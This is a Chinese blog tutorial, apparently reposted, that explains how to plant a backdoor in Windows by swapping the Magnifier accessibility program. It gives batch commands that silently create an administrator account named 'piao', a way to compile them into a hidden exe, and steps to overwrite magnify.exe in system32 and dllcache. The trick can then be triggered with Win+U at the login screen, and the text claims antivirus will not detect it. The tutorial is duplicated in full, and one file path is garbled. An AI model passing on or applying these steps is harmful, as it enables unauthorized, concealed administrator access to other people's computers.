“放大镜”这个程序在系统中是一个被忽视的角色,它的作用是帮助视力有障碍的用户也能够对系统进行正常操作。但是“放大镜”程序与系统中的其他程序相比有一个不同之处,就是它可以在系统还未登录的情况下运行。因此,如果我们将系统的“放大镜”程序替换掉,就能绕过系统登录验证做一些“越权”的事。
我们按下“Win+U”这个快捷键,可以运行“放大镜”程序,当然它的辅助作用对我们来说没有多大的用处。但由于“放大镜”程序有未登录运行这个特性,我们可以轻松将其制作成一个超级隐蔽的后门程序,并且永远不会被杀毒软件查杀。下面让我们一起来制作这个“放大镜”后门。
制作后门程序
首先我们来制作一个自己的后门程序,下载一款名为“Quick Batch File Compiler”的软件,这款软件的作用是将普通的bat文件制作成exe文件,我们主要用它来制作一个exe格式的后门程序。
双击“quickbfc.exe”运行程序,在其主界面的空白处输入如下命令:
net user piao 123456 /add
net localgroup administrators piao /add
c:windowssystem32 agnify.exe
这段命令的作用如下:第一句,创建一个名为piao,密码为123456的账户;第二句,将账户piao提升为系统管理员;第三句,运行nagnify.exe这个文件。nagnify.exe其实就是原“放大镜”的备份程序。
点击程序工具栏上的“选项”按钮,在“常规”标签中勾寻幽灵程序”选项,然后点击“确定”,该选项的作用是让由bat编译而成的exe文件在执行时不会弹出命令提示符窗口,这样就可以大大增加执行时的隐蔽性。最后,我们点击工具栏上的“生成”按钮,将其保存为magnify.exe。
替换原“放大镜”程序
“放大镜”程序所对应的系统文件是C:\WINDOWS\system32\magnify.exe,将其改名为nagnify.exe。然后复制刚才生成的magnify.exe文件到C:\WINDOWS\system32目录以及“C:\WINDOWS\system32\dllcache目录。OK,大功告成。
让我们来体验一下这个“放大镜”后门的效果到底如何。注销账户后来到系统登录界面,我们按下“Win+U”键,这时出现一个“辅助工具管理器”对话框,我们选中其中的放大镜,点击“启动”按钮,“放大镜”程序就正常运行了,但此时我们的后门账户也已经建立了,直接输入账户和密码进行登录吧。
我们按下“Win+U”这个快捷键,可以运行“放大镜”程序,当然它的辅助作用对我们来说没有多大的用处。但由于“放大镜”程序有未登录运行这个特性,我们可以轻松将其制作成一个超级隐蔽的后门程序,并且永远不会被杀毒软件查杀。下面让我们一起来制作这个“放大镜”后门。
制作后门程序
首先我们来制作一个自己的后门程序,下载一款名为“Quick Batch File Compiler”的软件,这款软件的作用是将普通的bat文件制作成exe文件,我们主要用它来制作一个exe格式的后门程序。
双击“quickbfc.exe”运行程序,在其主界面的空白处输入如下命令:
net user piao 123456 /add
net localgroup administrators piao /add
c:windowssystem32 agnify.exe
这段命令的作用如下:第一句,创建一个名为piao,密码为123456的账户;第二句,将账户piao提升为系统管理员;第三句,运行nagnify.exe这个文件。nagnify.exe其实就是原“放大镜”的备份程序。
点击程序工具栏上的“选项”按钮,在“常规”标签中勾寻幽灵程序”选项,然后点击“确定”,该选项的作用是让由bat编译而成的exe文件在执行时不会弹出命令提示符窗口,这样就可以大大增加执行时的隐蔽性。最后,我们点击工具栏上的“生成”按钮,将其保存为magnify.exe。
替换原“放大镜”程序
“放大镜”程序所对应的系统文件是C:\WINDOWS\system32\magnify.exe,将其改名为nagnify.exe。然后复制刚才生成的magnify.exe文件到C:\WINDOWS\system32目录以及“C:\WINDOWS\system32\dllcache目录。OK,大功告成。
让我们来体验一下这个“放大镜”后门的效果到底如何。注销账户后来到系统登录界面,我们按下“Win+U”键,这时出现一个“辅助工具管理器”对话框,我们选中其中的放大镜,点击“启动”按钮,“放大镜”程序就正常运行了,但此时我们的后门账户也已经建立了,直接输入账户和密码进行登录吧。
转载于:https://blog.51cto.com/liong/287827
3404
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
